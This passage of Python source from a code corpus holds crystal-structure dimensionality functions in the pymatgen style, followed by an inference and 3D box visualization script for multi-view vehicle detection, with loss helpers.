if max2 == max1:
dim = '0D'
else:
dim = 'intercalated molecule'
else:
dim = np.log2(float(max2) / max1)
if dim == int(dim):
dim = str(int(dim)) + 'D'
else:
structure = copy.copy(structure_save)
structure.make_supercell([[3, 0, 0], [0, 3, 0], [0, 0, 3]])
connected_list3 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max3, min3, clusters3 = find_clusters(structure, connected_list3)
if min3 == min2:
if max3 == max2:
dim = '0D'
else:
dim = 'intercalated molecule'
else:
dim = np.log2(float(max3) / max1) / np.log2(3)
if dim == int(dim):
dim = str(int(dim)) + 'D'
else:
return None
return dim
def find_connected_atoms(struct, tolerance=0.45, ldict=JmolNN().el_radius):
"""
Finds bonded atoms and returns a adjacency matrix of bonded atoms.
Author: "<NAME>"
Email: "<EMAIL>"
Args:
struct (Structure): Input structure
tolerance: length in angstroms used in finding bonded atoms. Two atoms
are considered bonded if (radius of atom 1) + (radius of atom 2) +
(tolerance) < (distance between atoms 1 and 2). Default
value = 0.45, the value used by JMol and Cheon et al.
ldict: dictionary of bond lengths used in finding bonded atoms. Values
from JMol are used as default
Returns:
(np.ndarray): A numpy array of shape (number of atoms, number of atoms);
If any image of atom j is bonded to atom i with periodic boundary
conditions, the matrix element [atom i, atom j] is 1.
"""
# pylint: disable=E1136
n_atoms = len(struct.species)
fc = np.array(struct.frac_coords)
fc_copy = np.repeat(fc[:, :, np.newaxis], 27, axis=2)
neighbors = np.array(list(itertools.product([0, 1, -1], [0, 1, -1], [0, 1, -1]))).T
neighbors = np.repeat(neighbors[np.newaxis, :, :], 1, axis=0)
fc_diff = fc_copy - neighbors
species = list(map(str, struct.species))
# in case of charged species
for i, item in enumerate(species):
if item not in ldict.keys():
species[i] = str(Specie.from_string(item).element)
latmat = struct.lattice.matrix
connected_matrix = np.zeros((n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(i + 1, n_atoms):
max_bond_length = ldict[species[i]] + ldict[species[j]] + tolerance
frac_diff = fc_diff[j] - fc_copy[i]
distance_ij = np.dot(latmat.T, frac_diff)
# print(np.linalg.norm(distance_ij,axis=0))
if sum(np.linalg.norm(distance_ij, axis=0) < max_bond_length) > 0:
connected_matrix[i, j] = 1
connected_matrix[j, i] = 1
return connected_matrix
def find_clusters(struct, connected_matrix):
"""
Finds bonded clusters of atoms in the structure with periodic boundary
conditions.
If there are atoms that are not bonded to anything, returns [0,1,0]. (For
faster computation time)
Author: "<NAME>"
Email: "<EMAIL>"
Args:
struct (Structure): Input structure
connected_matrix: Must be made from the same structure with
find_connected_atoms() function.
Returns:
max_cluster: the size of the largest cluster in the crystal structure
min_cluster: the size of the smallest cluster in the crystal structure
clusters: list of bonded clusters found here, clusters are formatted as
sets of indices of atoms
"""
n_atoms = len(struct.species)
if n_atoms == 0:
return [0, 0, 0]
if 0 in np.sum(connected_matrix, axis=0):
return [0, 1, 0]
cluster_sizes = []
clusters = []
visited = [False for item in range(n_atoms)]
connected_matrix += np.eye(len(connected_matrix))
def visit(atom, atom_cluster):
visited[atom] = True
new_cluster = set(np.where(connected_matrix[atom] != 0)[0]).union(atom_cluster)
atom_cluster = new_cluster
for new_atom in atom_cluster:
if not visited[new_atom]:
visited[new_atom] = True
atom_cluster = visit(new_atom, atom_cluster)
return atom_cluster
for i in range(n_atoms):
if not visited[i]:
atom_cluster = set()
cluster = visit(i, atom_cluster)
clusters.append(cluster)
cluster_sizes.append(len(cluster))
max_cluster = max(cluster_sizes)
min_cluster = min(cluster_sizes)
return [max_cluster, min_cluster, clusters]
def get_dimensionality_gorai(structure, max_hkl=2, el_radius_updates=None,
min_slab_size=5, min_vacuum_size=5,
standardize=True, bonds=None):
"""
This method returns whether a structure is 3D, 2D (layered), or 1D (linear
chains or molecules) according to the algorithm published in <NAME>.,
<NAME>. & <NAME>. Computational Identification of Promising
Thermoelectric Materials Among Known Quasi-2D Binary Compounds. J. Mater.
Chem. A 2, 4136 (2016).
Note that a 1D structure detection might indicate problems in the bonding
algorithm, particularly for ionic crystals (e.g., NaCl)
Users can change the behavior of bonds detection by passing either
el_radius_updates to update atomic radii for auto-detection of max bond
distances, or bonds to explicitly specify max bond distances for atom pairs.
Note that if you pass both, el_radius_updates are ignored.
Args:
structure: (Structure) structure to analyze dimensionality for
max_hkl: (int) max index of planes to look for layers
el_radius_updates: (dict) symbol->float to update atomic radii
min_slab_size: (float) internal surface construction parameter
min_vacuum_size: (float) internal surface construction parameter
standardize (bool): whether to standardize the structure before
analysis. Set to False only if you already have the structure in a
convention where layers / chains will be along low <hkl> indexes.
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
Returns: (int) the dimensionality of the structure - 1 (molecules/chains),
2 (layered), or 3 (3D)
"""
if standardize:
structure = SpacegroupAnalyzer(structure). \
get_conventional_standard_structure()
if not bonds:
bonds = get_max_bond_lengths(structure, el_radius_updates)
num_surfaces = 0
for h in range(max_hkl):
for k in range(max_hkl):
for l in range(max_hkl):
if max([h, k, l]) > 0 and num_surfaces < 2:
sg = SlabGenerator(structure, (h, k, l),
min_slab_size=min_slab_size,
min_vacuum_size=min_vacuum_size)
slabs = sg.get_slabs(bonds)
for _ in slabs:
num_surfaces += 1
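    # num_surfaces tallies the bond-preserving slabs found among the low-index
    # planes above; the return value maps that count to a dimensionality:
    # no slabs gives 3 (3D), one gives 2 (layered), two or more give 1.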
return 3 - min(num_surfaces, 2)
|
StarcoderdataPython
|
125805
|
<filename>codes/infer.py<gh_stars>10-100
import math
import torch.nn.functional as F
import matplotlib
import sys
from codes.evaluation.pyeval.calAOS import evaluateDetectionAPAOS
from codes.evaluation.evaluate import evaluate
from codes.utils import array_tool as at
from torchvision.ops import boxes as box_ops
import time
import cv2
import os
from codes.EX_CONST import Const
import numpy as np
import torch
import torchvision.transforms as T
from codes.models.persp_trans_detector import PerspTransDetector
from codes.utils.image_utils import img_color_denormalize
from codes.datasets.MVM3D import MVM3D
from codes.datasets.MVM3D_loader import MVM3D_loader
from codes.models.MbonHead import MbonHead
import argparse
os.environ['OMP_NUM_THREADS'] = '1'
matplotlib.use('Agg')
sys.path.append("../..")
class BaseTrainer(object):
def __init__(self):
super(BaseTrainer, self).__init__()
class Inferer(BaseTrainer):
def __init__(self, model, roi_head, denormalize):
self.model = model
self.roi_head = roi_head
self.denormalize = denormalize
self.bins = Const.bins
def infer(self, data_loader):
all_pred_res = []
all_gt_res = []
for batch_idx, data in enumerate(data_loader):
imgs, bev_xy, bev_angle, gt_bbox, gt_left_bbox, gt_right_bbox, left_dirs, right_dirs, left_sincos, right_sincos, left_orientation, right_orientation, left_conf, right_conf, frame, extrin, intrin, mark = data
with torch.no_grad():
rpn_locs, rpn_scores, anchor, rois, roi_indices, img_featuremaps, bev_featuremaps = self.model(imgs, frame, mark=mark)
roi = torch.tensor(rois)
# -----------Projection------------
roi_3d = generate_3d_bbox(roi)
left_2d_bbox = getprojected_3dbox(roi_3d, extrin, intrin, isleft=True)
right_2d_bbox = getprojected_3dbox(roi_3d, extrin, intrin, isleft=False)
left_2d_bbox = get_outter(left_2d_bbox)
right_2d_bbox = get_outter(right_2d_bbox)
left_index_inside = np.where(
(left_2d_bbox[:, 0] >= 0) &
(left_2d_bbox[:, 1] >= 0) &
(left_2d_bbox[:, 2] <= Const.ori_img_height) &
(left_2d_bbox[:, 3] <= Const.ori_img_width)
)[0]
right_index_inside = np.where(
(right_2d_bbox[:, 0] >= 0) &
(right_2d_bbox[:, 1] >= 0) &
(right_2d_bbox[:, 2] <= Const.ori_img_height) &
(right_2d_bbox[:, 3] <= Const.ori_img_width)
)[0]
if len(right_index_inside) == 0 or len(left_index_inside) == 0:
continue
left_2d_bbox = left_2d_bbox[left_index_inside]
right_2d_bbox = right_2d_bbox[right_index_inside]
left_rois_indices = roi_indices[left_index_inside]
right_rois_indices = roi_indices[right_index_inside]
left_2d_bbox = torch.tensor(left_2d_bbox)
right_2d_bbox = torch.tensor(right_2d_bbox)
# ------------MBON-----------
left_roi_cls_loc, left_roi_score, left_pred_orientation, left_pred_conf = self.roi_head(
img_featuremaps[0],
torch.tensor(left_2d_bbox).to(img_featuremaps[0].device),
left_rois_indices)
right_roi_cls_loc, right_roi_score, right_pred_orientation, right_pred_conf = self.roi_head(
img_featuremaps[1],
torch.tensor(right_2d_bbox).to(img_featuremaps[1].device),
right_rois_indices)
angle_bins = generate_bins(self.bins)
tmp = np.zeros(shape=left_pred_conf.shape)
tmp += angle_bins
left_angle_bins = tmp
tmp = np.zeros(shape=right_pred_conf.shape)
tmp += angle_bins
right_angle_bins = tmp
left_argmax = np.argmax(left_pred_conf.detach().cpu().numpy(), axis=1)
left_orient = left_pred_orientation[np.arange(len(left_pred_orientation)), left_argmax]
left_cos = left_orient[:, 0]
left_sin = left_orient[:, 1]
left_alpha = np.arctan2(left_sin.cpu().detach().numpy(), left_cos.cpu().detach().numpy())
left_alpha += left_angle_bins[np.arange(len(left_argmax)), left_argmax] # 0~180, (R, 2), residual angle
right_argmax = np.argmax(right_pred_conf.detach().cpu().numpy(), axis=1)
right_orient = right_pred_orientation[np.arange(len(right_pred_orientation)), right_argmax]
right_cos = right_orient[:, 0]
right_sin = right_orient[:, 1]
right_alpha = np.arctan2(right_sin.cpu().detach().numpy(), right_cos.cpu().detach().numpy())
right_alpha += right_angle_bins[np.arange(len(right_argmax)), right_argmax] # 0~180, (R, 2), residual angle
left_prob = at.tonumpy(F.softmax(at.totensor(left_roi_score), dim=1))
left_front_prob = left_prob[:, 1]
right_prob = at.tonumpy(F.softmax(at.totensor(right_roi_score), dim=1))
right_front_prob = right_prob[:, 1]
position_mark = np.concatenate(
(np.zeros((left_front_prob.shape[0],)), np.ones((right_front_prob.shape[0]))))
all_front_prob = np.concatenate((left_front_prob, right_front_prob))
all_roi_remain = np.concatenate((roi[left_index_inside], roi[right_index_inside]))
all_pred_alpha = np.concatenate((at.tonumpy(left_alpha), at.tonumpy(right_alpha)))
v, indices = torch.tensor(all_front_prob).sort(0)
indices_remain = indices[v > 0.6]
print("Frame Number: ", frame.item())
all_roi_remain = all_roi_remain[indices_remain].reshape(len(indices_remain), 4)
all_pred_alpha = all_pred_alpha[indices_remain].reshape(len(indices_remain), 1)
all_front_prob = all_front_prob[indices_remain].reshape(len(indices_remain), )
position_mark = position_mark[indices_remain].reshape(len(indices_remain), 1)
all_bev_boxes = []
if indices_remain.shape[0] != 0:
if indices_remain.shape[0] == 1:
keep = [0]
else:
keep = box_ops.nms(torch.tensor(all_roi_remain), torch.tensor(all_front_prob), 0)
all_bev_boxes, all_pred_alpha, position_mark_keep = all_roi_remain[keep].reshape(len(keep), 4), \
all_pred_alpha[keep].reshape(len(keep), 1), \
position_mark[keep].reshape(len(keep))
if len(all_bev_boxes) != 0:
test_gt_res, test_pred_res = visualize_3dbox(all_bev_boxes, all_pred_alpha, position_mark_keep, gt_bbox,
bev_angle, all_front_prob[keep], extrin, intrin, frame)
for p in range(len(test_gt_res)):
all_gt_res.append(test_gt_res[p])
for l in range(len(test_pred_res)):
all_pred_res.append(test_pred_res[l])
res_fpath = '%s/res/all_res.txt' % Const.data_root
all_gt_fpath = '%s/res/all_test_gt.txt' % Const.data_root
all_gt_res = np.array(all_gt_res).reshape(-1, 14)
all_pred_res = np.array(all_pred_res).reshape(-1, 15)
np.savetxt(res_fpath, all_pred_res, "%f")
np.savetxt(all_gt_fpath, all_gt_res, "%f")
recall, precision, moda, modp = evaluate(os.path.abspath(res_fpath), os.path.abspath(all_gt_fpath),
data_loader.dataset.base.__name__)
AP_50, AOS_50, OS_50, AP_25, AOS_25, OS_25 = evaluateDetectionAPAOS(res_fpath, all_gt_fpath)
print()
print("MODA: %.1f" % moda, ", MODP: %.1f" % modp, ", Prec .: %.1f" % precision, ", Recall: %.1f" % recall )
print("AP_50: %.1f" % AP_50, " ,AOS_50: %.1f" % AOS_50, ", OS_50: %.2f" % OS_50)
print("AP_25: %.1f" % AP_25, " ,AOS_25: %.1f" % AOS_25, ", OS_25: %.2f" % OS_25)
@property
def n_class(self):
return self.roi_head.n_class
def generate_bins(bins):
angle_bins = np.zeros(bins)
interval = 2 * np.pi / bins
for i in range(1, bins):
angle_bins[i] = i * interval
angle_bins += interval / 2 # center of the bin
return angle_bins
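# For example (annotation, not in the original): generate_bins(2) returns
# [pi/2, 3*pi/2], i.e. the centres of two bins that split the full circle.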
def visualize_3dbox(pred_ori, pred_alpha, position_mark, gt_bbox, bev_angle, all_front_prob, extrin, intrin, idx, isRoi=False):
# left_img = cv2.imread("/home/dzc/Data/%s/img/left1/%d.jpg" % (Const.dataset, idx))
right_img = cv2.imread("%s/img/right2/%d.jpg" % (Const.data_root, idx))
all_pred_res = []
all_gt_res = []
n_bbox = pred_ori.shape[0]
gt_bbox = gt_bbox[0]
bev_angle = bev_angle[0]
gt_n_bbox = gt_bbox.shape[0]
# ======================Gt========================
boxes_3d = []
for j, bbox in enumerate(gt_bbox):
ymin, xmin, ymax, xmax = bbox
theta = bev_angle[j]
center_x, center_y = int((xmin + xmax) // 2), int((ymin + ymax) // 2)
w = Const.car_length
h = Const.car_width
xmin = center_x - w // 2
xmax = center_x + w // 2
ymin = center_y - h // 2
ymax = center_y + h // 2
x1_ori, x2_ori, x3_ori, x4_ori, x_mid = xmin, xmin, xmax, xmax, (xmin + xmax) / 2 - 40
y1_ori, y2_ori, y3_ori, y4_ori, y_mid = Const.grid_height - ymin, Const.grid_height - ymax, Const.grid_height - ymax, Const.grid_height - ymin, (
Const.grid_height - ymax + Const.grid_height - ymin) / 2
x1_rot, x2_rot, x3_rot, x4_rot, xmid_rot = \
int(math.cos(theta) * (x1_ori - center_x) - math.sin(theta) * (
y1_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x2_ori - center_x) - math.sin(theta) * (
y2_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x3_ori - center_x) - math.sin(theta) * (
y3_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x4_ori - center_x) - math.sin(theta) * (
y4_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x_mid - center_x) - math.sin(theta) * (
y_mid - (Const.grid_height - center_y)) + center_x)
y1_rot, y2_rot, y3_rot, y4_rot, ymid_rot = \
int(math.sin(theta) * (x1_ori - center_x) + math.cos(theta) * (y1_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x2_ori - center_x) + math.cos(theta) * (y2_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x3_ori - center_x) + math.cos(theta) * (y3_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x4_ori - center_x) + math.cos(theta) * (y4_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x_mid - center_x) + math.cos(theta) * (y_mid - (Const.grid_height - center_y)) + (
Const.grid_height - center_y))
all_gt_res.append(
[idx.item(), center_x, center_y, w, h, np.rad2deg(theta.item()), x1_rot, y1_rot, x2_rot, y2_rot, x3_rot,
y3_rot, x4_rot, y4_rot])
pt0 = [x1_rot, y1_rot, 0]
pt1 = [x2_rot, y2_rot, 0]
pt2 = [x3_rot, y3_rot, 0]
pt3 = [x4_rot, y4_rot, 0]
pt_h_0 = [x1_rot, y1_rot, Const.car_height]
pt_h_1 = [x2_rot, y2_rot, Const.car_height]
pt_h_2 = [x3_rot, y3_rot, Const.car_height]
pt_h_3 = [x4_rot, y4_rot, Const.car_height]
pt_extra = [xmid_rot, ymid_rot, 0]
boxes_3d.append([pt0, pt1, pt2, pt3, pt_h_0, pt_h_1, pt_h_2, pt_h_3, pt_extra])
gt_ori = np.array(boxes_3d).reshape((gt_n_bbox, 9, 3))
# gt_projected_2d = getprojected_3dbox(gt_ori, extrin, intrin, isleft=True)
gt_projected_2d = getprojected_3dbox(gt_ori, extrin, intrin, isleft=False)
for k in range(gt_n_bbox):
color = (0, 60, 199)
cv2.line(right_img, (gt_projected_2d[k][0][0], gt_projected_2d[k][0][1]),
(gt_projected_2d[k][1][0], gt_projected_2d[k][1][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][0][0], gt_projected_2d[k][0][1]),
(gt_projected_2d[k][3][0], gt_projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][0][0], gt_projected_2d[k][0][1]),
(gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][1][0], gt_projected_2d[k][1][1]),
(gt_projected_2d[k][5][0], gt_projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][1][0], gt_projected_2d[k][1][1]),
(gt_projected_2d[k][2][0], gt_projected_2d[k][2][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][2][0], gt_projected_2d[k][2][1]),
(gt_projected_2d[k][3][0], gt_projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][2][0], gt_projected_2d[k][2][1]),
(gt_projected_2d[k][6][0], gt_projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][3][0], gt_projected_2d[k][3][1]),
(gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]),
(gt_projected_2d[k][5][0], gt_projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][5][0], gt_projected_2d[k][5][1]),
(gt_projected_2d[k][6][0], gt_projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][6][0], gt_projected_2d[k][6][1]),
(gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]),
(gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]),
(gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]), color=color, thickness=2)
cv2.arrowedLine(right_img, (int((gt_projected_2d[k][0][0] + gt_projected_2d[k][2][0]) / 2),
int((gt_projected_2d[k][0][1] + gt_projected_2d[k][2][1]) / 2)),
(gt_projected_2d[k][8][0], gt_projected_2d[k][8][1]), color=(255, 60, 199), thickness=2)
cv2.imwrite("result_images/%d_gt.jpg" % (idx), right_img)
right_img = cv2.imread("%s/img/right2/%d.jpg" % (Const.data_root, idx))
boxes_3d = []
for i, bbox in enumerate(pred_ori):
ymin, xmin, ymax, xmax = bbox
alpha = pred_alpha[i]
if pred_alpha.shape[0] == 1:
score = 1.0
else:
score = all_front_prob[i]
if position_mark[i] == 0:
center_x, center_y = int((bbox[1] + bbox[3]) // 2), int((bbox[0] + bbox[2]) // 2)
w, h = Const.car_length, Const.car_width
xmin = center_x - w//2
xmax = center_x + w//2
ymin = center_y - h//2
ymax = center_y + h//2
x1_ori, x2_ori, x3_ori, x4_ori, x_mid = xmin, xmin, xmax, xmax, (xmin + xmax) / 2 + 40
y1_ori, y2_ori, y3_ori, y4_ori, y_mid = Const.grid_height - ymin, Const.grid_height - ymax, Const.grid_height - ymax, Const.grid_height - ymin, (
Const.grid_height - ymax + Const.grid_height - ymin) / 2
center_x, center_y = int((bbox[1] + bbox[3]) // 2), int((bbox[0] + bbox[2]) // 2)
ray = np.arctan((Const.grid_height - center_y) / center_x)
angle = alpha
else:
center_x, center_y = int((xmin + xmax) // 2), int((ymin + ymax) // 2)
w, h = Const.car_length, Const.car_width
xmin = center_x - w // 2
xmax = center_x + w // 2
ymin = center_y - h // 2
ymax = center_y + h // 2
x1_ori, x2_ori, x3_ori, x4_ori, x_mid = xmin, xmin, xmax, xmax, (xmin + xmax) / 2 - 40
y1_ori, y2_ori, y3_ori, y4_ori, y_mid = Const.grid_height - ymin, Const.grid_height - ymax, Const.grid_height - ymax, Const.grid_height - ymin, (
Const.grid_height - ymax + Const.grid_height - ymin) / 2
center_x, center_y = int((xmin + xmax) // 2), int((ymin + ymax) // 2)
ray = np.arctan(center_y / (Const.grid_width - center_x))
angle = alpha
theta_l = angle
theta = theta_l + ray
x1_rot, x2_rot, x3_rot, x4_rot, xmid_rot = \
int(math.cos(theta) * (x1_ori - center_x) - math.sin(theta) * (
y1_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x2_ori - center_x) - math.sin(theta) * (
y2_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x3_ori - center_x) - math.sin(theta) * (
y3_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x4_ori - center_x) - math.sin(theta) * (
y4_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x_mid - center_x) - math.sin(theta) * (
y_mid - (Const.grid_height - center_y)) + center_x)
y1_rot, y2_rot, y3_rot, y4_rot, ymid_rot = \
int(math.sin(theta) * (x1_ori - center_x) + math.cos(theta) * (y1_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x2_ori - center_x) + math.cos(theta) * (y2_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x3_ori - center_x) + math.cos(theta) * (y3_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x4_ori - center_x) + math.cos(theta) * (y4_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x_mid - center_x) + math.cos(theta) * (y_mid - (Const.grid_height - center_y)) + (
Const.grid_height - center_y))
if position_mark[i] == 0:
theta_left = theta + np.pi
all_pred_res.append(
[idx.item(), center_x, center_y, w, h, np.rad2deg(theta_left.item()), score, x1_rot, y1_rot, x2_rot,
y2_rot, x3_rot, y3_rot, x4_rot, y4_rot])
else:
all_pred_res.append(
[idx.item(), center_x, center_y, w, h, np.rad2deg(theta.item()), score, x1_rot, y1_rot, x2_rot, y2_rot,
x3_rot, y3_rot, x4_rot, y4_rot])
pt0 = [x1_rot, y1_rot, 0]
pt1 = [x2_rot, y2_rot, 0]
pt2 = [x3_rot, y3_rot, 0]
pt3 = [x4_rot, y4_rot, 0]
pt_h_0 = [x1_rot, y1_rot, Const.car_height]
pt_h_1 = [x2_rot, y2_rot, Const.car_height]
pt_h_2 = [x3_rot, y3_rot, Const.car_height]
pt_h_3 = [x4_rot, y4_rot, Const.car_height]
pt_extra = [xmid_rot, ymid_rot, 0]
boxes_3d.append([pt0, pt1, pt2, pt3, pt_h_0, pt_h_1, pt_h_2, pt_h_3, pt_extra])
pred_ori = np.array(boxes_3d).reshape((n_bbox, 9, 3))
# projected_2d_left = getprojected_3dbox(pred_ori, extrin, intrin, isleft=True)
projected_2d = getprojected_3dbox(pred_ori, extrin, intrin, isleft=False)
for k in range(n_bbox):
        if position_mark[k] == 0:
            color = (0, 255, 0)  # earlier per-view colour (255, 255, 0) is overridden; both views draw in green
        else:
            color = (0, 255, 0)  # earlier per-view colour (100, 100, 200) is overridden; both views draw in green
if position_mark[k] == 1 and isRoi:
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][1][0], projected_2d[k][1][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][2][0], projected_2d[k][2][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][3][0], projected_2d[k][3][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][4][0], projected_2d[k][4][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][5][0], projected_2d[k][5][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][6][0], projected_2d[k][6][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
else:
cv2.arrowedLine(right_img, (int((projected_2d[k][0][0] + projected_2d[k][2][0]) / 2),
int((projected_2d[k][0][1] + projected_2d[k][2][1]) / 2)),
(projected_2d[k][8][0], projected_2d[k][8][1]), color=(255, 60, 199), thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][1][0], projected_2d[k][1][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][2][0], projected_2d[k][2][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][3][0], projected_2d[k][3][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][4][0], projected_2d[k][4][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][5][0], projected_2d[k][5][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][6][0], projected_2d[k][6][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.arrowedLine(right_img, (int((projected_2d[k][0][0] + projected_2d[k][2][0]) / 2),
int((projected_2d[k][0][1] + projected_2d[k][2][1]) / 2)),
(projected_2d[k][8][0], projected_2d[k][8][1]), color=(255, 60, 199), thickness=2)
if isRoi:
cv2.imwrite("/home/dzc/Desktop/CASIA/proj/mvRPN-det/results/images/3d_box_blend/%d_roi.jpg" % idx, right_img)
else:
cv2.imwrite("result_images/%d.jpg" % (idx), right_img)
return all_gt_res, all_pred_res
def _smooth_l1_loss(x, t, in_weight, sigma):
sigma2 = sigma ** 2
diff = in_weight * (x - t)
abs_diff = diff.abs()
flag = (abs_diff.data < (1. / sigma2)).float()
y = (flag * (sigma2 / 2.) * (diff ** 2) +
(1 - flag) * (abs_diff - 0.5 / sigma2))
return y.sum()
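# Hedged usage sketch of the smooth L1 term above (relies on the module's
# existing torch import; the tensors below are made up for illustration).
# With sigma=1 the loss is 0.5*d^2 for |d| < 1 and |d| - 0.5 otherwise.
def _demo_smooth_l1_loss():
    x = torch.tensor([0.5, 2.0])
    t = torch.zeros(2)
    in_weight = torch.ones(2)
    # 0.5 * 0.5**2 + (2.0 - 0.5) = 1.625
    return _smooth_l1_loss(x, t, in_weight, sigma=1.0)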
def _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma):
in_weight = torch.zeros(gt_loc.shape).to(pred_loc.device)
gt_loc = torch.tensor(gt_loc).to(pred_loc.device)
gt_label = torch.tensor(gt_label).to(pred_loc.device)
# print(in_weight.shape, gt_loc.shape, gt_label.shape)
# Localization loss is calculated only for positive rois.
# NOTE: unlike origin implementation,
# we don't need inside_weight and outside_weight, they can calculate by gt_label
    in_weight[(gt_label > 0).view(-1, 1).expand_as(in_weight)] = 1
loc_loss = _smooth_l1_loss(pred_loc, gt_loc, in_weight.detach(), sigma)
# Normalize by total number of negtive and positive rois.
loc_loss /= ((gt_label >= 0).sum().float()) # ignore gt_label==-1 for rpn_loss
return loc_loss
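# Hedged usage sketch: only rows with gt_label > 0 contribute to the
# localization loss, and the sum is normalized by the count of non-ignored
# (label >= 0) samples, mirroring the usual Faster R-CNN recipe. The dummy
# tensors below are illustrative only.
def _demo_fast_rcnn_loc_loss():
    pred_loc = torch.zeros(3, 4)
    gt_loc = torch.ones(3, 4)
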